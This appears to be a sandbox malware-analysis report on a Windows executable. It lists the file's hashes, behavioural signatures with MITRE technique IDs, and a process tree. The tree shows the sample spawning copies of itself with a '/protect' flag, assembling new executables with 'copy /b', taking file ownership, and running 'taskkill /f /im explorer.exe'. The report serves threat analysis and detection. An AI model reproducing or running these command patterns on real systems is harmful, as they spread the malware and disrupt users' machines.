ad41715251c9bbf8799f74c119ae36633c5503a24d810a330fbd3cc4cd28c00a

Analysis

max time kernel
57s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
22/10/2023, 16:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Size

3.0MB
MD5

0e3baa4a5958cfc6c75b731f2e8fd1d0
SHA1

3e21f79a280ff4dc048235794e737d7a32ebb6ea
SHA256

ad41715251c9bbf8799f74c119ae36633c5503a24d810a330fbd3cc4cd28c00a
SHA512

c3fd9a7cbaa4d9f90682cb15d51f9d9e5d776631bc9370d4fb0c3dba227f94e7bf619f037eb8b405d0b527f11d50f5cf26d70a2c2602218dc56a28116e55f30f
SSDEEP

49152:j495UciMmq/NhjX5p3JOCdLAweZnE5c965nqqIP2Itdo:jk5LhzACdLAlnE5co5nqqIP2Itdo

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 60 IoCs

pid	Process
3068	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
5012	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
3576	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
208	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
2044	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
5052	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
2072	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
796	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
3004	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
2116	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
4620	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
1844	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
2252	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
3924	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe
1616	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
380	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
5092	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
1556	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
2160	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
1468	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe
5152	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
5280	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
5668	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
5804	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
5912	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe
5956	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
5920	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
6032	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
6072	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
4868	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe
5500	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
4080	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
6056	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
5744	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
6104	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
3312	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
5620	cmd.exe
316	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe
4124	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
1720	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe
5400	cmd.exe
5388	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe
3960	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
2748	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe
6548	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
6776	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
7048	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
7052	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe
7368	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
5268	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe
7484	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe
1596	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d010.exe
9260	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
9284	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
9384	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
9392	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d067.exe
9268	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe
9464	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
10164	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe
10172	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5436	takeown.exe
704	takeown.exe
1432	takeown.exe
6952	takeown.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 47 IoCs

evasion

pid	Process
10552	taskkill.exe
4784	taskkill.exe
6328	taskkill.exe
10208	taskkill.exe
8256	taskkill.exe
8692	taskkill.exe
4964	taskkill.exe
7164	taskkill.exe
6292	taskkill.exe
8800	taskkill.exe
6760	taskkill.exe
9292	taskkill.exe
9276	taskkill.exe
10148	taskkill.exe
10140	taskkill.exe
9172	taskkill.exe
10516	taskkill.exe
1160	taskkill.exe
6468	taskkill.exe
10156	taskkill.exe
9420	taskkill.exe
9120	taskkill.exe
6012	taskkill.exe
4916	taskkill.exe
9768	taskkill.exe
6780	taskkill.exe
7840	taskkill.exe
8044	taskkill.exe
5960	taskkill.exe
4288	taskkill.exe
2188	taskkill.exe
9760	taskkill.exe
11908	taskkill.exe
11616	taskkill.exe
6756	taskkill.exe
6464	taskkill.exe
10364	taskkill.exe
6560	taskkill.exe
3248	taskkill.exe
6604	taskkill.exe
10028	taskkill.exe
1412	taskkill.exe
7240	taskkill.exe
9092	taskkill.exe
764	taskkill.exe
3552	taskkill.exe
7412	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1511405631-3522522280-778892991-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1511405631-3522522280-778892991-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1511405631-3522522280-778892991-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1620	msedge.exe
1620	msedge.exe
7160	msedge.exe
7160	msedge.exe
5780	chrome.exe
5780	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
5780	chrome.exe
5780	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeAssignPrimaryTokenPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeLockMemoryPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeIncreaseQuotaPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeMachineAccountPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeTcbPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeSecurityPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeTakeOwnershipPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeLoadDriverPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeSystemProfilePrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeSystemtimePrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeProfSingleProcessPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeIncBasePriorityPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeCreatePagefilePrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeCreatePermanentPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeBackupPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeRestorePrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeShutdownPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeDebugPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeAuditPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeSystemEnvironmentPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeChangeNotifyPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeRemoteShutdownPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeUndockPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeSyncAgentPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeEnableDelegationPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeManageVolumePrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeImpersonatePrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeCreateGlobalPrivilege	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: 31	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: 32	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: 33	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: 34	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: 35	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeCreateTokenPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeAssignPrimaryTokenPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeLockMemoryPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeIncreaseQuotaPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeMachineAccountPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeTcbPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeSecurityPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeTakeOwnershipPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeLoadDriverPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeSystemProfilePrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeSystemtimePrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeProfSingleProcessPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeIncBasePriorityPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeCreatePagefilePrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeCreatePermanentPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeBackupPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeRestorePrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeShutdownPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeDebugPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeAuditPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeSystemEnvironmentPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeChangeNotifyPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeRemoteShutdownPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeUndockPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeSyncAgentPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeEnableDelegationPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeManageVolumePrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeImpersonatePrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: SeCreateGlobalPrivilege	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
Token: 31	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
7728	firefox.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
7728	firefox.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
1620	msedge.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
7728	firefox.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe
5780	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
7728	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1188 wrote to memory of 1264	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	89
PID 1188 wrote to memory of 1264	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	89
PID 1264 wrote to memory of 2608	1264	cmd.exe	90
PID 1264 wrote to memory of 2608	1264	cmd.exe	90
PID 1188 wrote to memory of 3008	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	92
PID 1188 wrote to memory of 3008	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	92
PID 3008 wrote to memory of 4424	3008	cmd.exe	93
PID 3008 wrote to memory of 4424	3008	cmd.exe	93
PID 1188 wrote to memory of 4084	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	95
PID 1188 wrote to memory of 4084	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	95
PID 2608 wrote to memory of 2116	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	161
PID 2608 wrote to memory of 2116	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	161
PID 4084 wrote to memory of 4228	4084	cmd.exe	97
PID 4084 wrote to memory of 4228	4084	cmd.exe	97
PID 1188 wrote to memory of 1524	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	100
PID 1188 wrote to memory of 1524	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	100
PID 2608 wrote to memory of 1056	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	155
PID 2608 wrote to memory of 1056	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	155
PID 1524 wrote to memory of 1744	1524	cmd.exe	101
PID 1524 wrote to memory of 1744	1524	cmd.exe	101
PID 4228 wrote to memory of 3972	4228	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	102
PID 4228 wrote to memory of 3972	4228	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	102
PID 1188 wrote to memory of 3392	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	106
PID 1188 wrote to memory of 3392	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	106
PID 4228 wrote to memory of 3044	4228	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	105
PID 4228 wrote to memory of 3044	4228	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	105
PID 1056 wrote to memory of 3068	1056	Conhost.exe	104
PID 1056 wrote to memory of 3068	1056	Conhost.exe	104
PID 3392 wrote to memory of 2976	3392	cmd.exe	110
PID 3392 wrote to memory of 2976	3392	cmd.exe	110
PID 2608 wrote to memory of 3616	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	111
PID 2608 wrote to memory of 3616	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	111
PID 1188 wrote to memory of 4728	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	112
PID 1188 wrote to memory of 4728	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	112
PID 4728 wrote to memory of 1528	4728	cmd.exe	118
PID 4728 wrote to memory of 1528	4728	cmd.exe	118
PID 3068 wrote to memory of 1332	3068	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe	113
PID 3068 wrote to memory of 1332	3068	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe	113
PID 3044 wrote to memory of 5012	3044	cmd.exe	114
PID 3044 wrote to memory of 5012	3044	cmd.exe	114
PID 2976 wrote to memory of 4324	2976	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	117
PID 2976 wrote to memory of 4324	2976	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	117
PID 4228 wrote to memory of 1168	4228	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	119
PID 4228 wrote to memory of 1168	4228	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	119
PID 1188 wrote to memory of 4060	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	167
PID 1188 wrote to memory of 4060	1188	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	167
PID 4228 wrote to memory of 3760	4228	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	121
PID 4228 wrote to memory of 3760	4228	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	121
PID 5012 wrote to memory of 1932	5012	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe	138
PID 5012 wrote to memory of 1932	5012	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe	138
PID 1332 wrote to memory of 3576	1332	cmd.exe	137
PID 1332 wrote to memory of 3576	1332	cmd.exe	137
PID 2976 wrote to memory of 3632	2976	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	136
PID 2976 wrote to memory of 3632	2976	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	136
PID 1932 wrote to memory of 208	1932	cmd.exe	135
PID 1932 wrote to memory of 208	1932	cmd.exe	135
PID 3632 wrote to memory of 2044	3632	cmd.exe	123
PID 3632 wrote to memory of 2044	3632	cmd.exe	123
PID 3760 wrote to memory of 5052	3760	cmd.exe	134
PID 3760 wrote to memory of 5052	3760	cmd.exe	134
PID 2608 wrote to memory of 4632	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	125
PID 2608 wrote to memory of 4632	2608	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe	125
PID 3068 wrote to memory of 2128	3068	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe	171
PID 3068 wrote to memory of 2128	3068	NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe	171

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1264
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+123371.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
      4⤵
      PID:2116
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe 1697996445
      4⤵
      PID:1056
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe 1697996445
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3068
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /protect 1697996445
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /protect 1697996445
        7⤵
        Executes dropped EXE
        
        PID:3576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe 1697996445
        8⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe 1697996445
        9⤵
        Executes dropped EXE
        
        PID:3924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /protect 1697996445
        10⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe /protect 1697996445
        11⤵
        Executes dropped EXE
        
        PID:5912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0184.exe 1697996445
        12⤵
        
        PID:976
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0184.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0184.exe 1697996445
        13⤵
        
        PID:10748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:5648
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        15⤵
        Kills process with taskkill
        
        PID:7164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe+38555.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0183.exe
        12⤵
        
        PID:6320
        
        C:\Windows\system32\cmd.exe
        
